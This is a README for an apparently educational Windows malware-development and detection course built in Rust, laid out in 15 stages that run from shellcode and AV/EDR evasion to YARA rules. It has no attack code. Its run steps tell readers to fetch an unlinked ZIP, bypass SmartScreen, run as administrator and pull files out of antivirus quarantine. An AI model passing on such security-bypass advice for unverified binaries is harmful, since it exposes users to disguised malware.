About this project

# 🧠 goodboy-framework - Learn Windows Malware Analysis Fast goodboy-framework is a Windows learning tool for malware analysis, red team testing, and blue team detection practice. It is built in Rust and split into 15 stages. Each stage shows a different part of the workflow, from build steps to detection checks. ## 🚀 Getting Started Download the project from the provided link, extract the ZIP file, and run the main executable or batch file on a Windows 10/11 PC. The tool guides users through 15 sequential stages, from initial setup to final detection validation. ## 🖥️ Requirements - Windows 10 or Windows 11 - Stable internet connection - At least 4 GB RAM and 2 GB free disk space - Permission to run files - ZIP tool (File Explorer or 7-Zip) - Optional: Rust/Cargo, Git, and a text editor for rebuilding ## 🏁 Running the Tool 1. Extract the downloaded ZIP file 2. Open the `goodboy-framework` folder 3. Double-click the main file (README, run, launcher, or .exe) 4. Approve any permission prompts 5. If SmartScreen appears, choose "More info" then "Run anyway" if trusted 6. For batch files, right-click and select Open ## 🧭 First-Time Setup - Choose a working folder for lab files - Let the tool create stage folders - Keep default options unless experienced - Read each stage name before proceeding - Use one stage at a time, starting with Stage 1 ## 🔍 The 15 Stages ### Stages 1-3 - Project setup - Building the first Windows binary - Checking basic file behavior ### Stages 4-6 - Adding simple shellcode flow - Reviewing process launch steps - Comparing file output before/after changes ### Stages 7-9 - Studying detection points - Testing common AV and EDR checks - Understanding how analysts spot risky patterns ### Stages 10-12 - Working with Windows internals - Reviewing memory use and process trees - Practicing reverse-engineering habits ### Stages 13-15 - Improving detection rules - Using YARA-style matching - Validating final samples and comparing results ## 🧪 Usage as a Learning Lab Run one stage at a time, observe changes, record sample behavior, and compare with previous stages. Blue team focus areas include file names, process creation, network calls, suspicious strings, memory use, and detection rules. Red team focus areas include build changes, sample structure, behavior changes, and evasion difficulty. ## 🧰 Troubleshooting If the app doesn't start: - Move folder out of OneDrive - Run as administrator - Unblock the file in properties - Check antivirus quarantine - Ensure no strange characters in path - Reboot and retry For missing file errors: - Confirm full archive extraction - Check no files were removed during download - Keep all files in the same folder ## 🧑‍💻 Rebuilding from Source Install Rust, open Command Prompt, navigate to the project folder, and run: - `cargo build` - `cargo run` - `cargo build --release` (for final lab testing) ## 🛡️ Safe Lab Setup Use a test machine or VM with: - Windows VM - Second analysis VM - Private network - Snapshot support - Logging tools Recommended analysis tools: Process Explorer, Procmon, Wireshark, PE-bear, YARA, Windows Event Viewer ## 📚 Learning Approach 1. Start with behavior, not code 2. Note file names, paths, and process names 3. Save screenshots of each stage 4. Write short notes per run 5. Compare results with previous tests 6. Use detection tools after each change ## 🔗 Project Details - Topics: antivirus evasion, blue team, CTF, cybersecurity, detection engineering, education, malware analysis, malware development, pentesting, red team, reverse engineering, Rust, shellcode, Windows, YARA - Format: 15-stage Windows Rust course - Focus: build, test, study, and detect Windows samples ## 🛠️ File Layout After extraction, the folder may include source code folders, stage folders, build files, README files, output binaries, detection notes, and rule examples. ## 🧩 Expected Behavior When running, you may see a stage selection menu, console output, file creation in the working folder, basic Windows process activity, and clear stage-by-stage changes.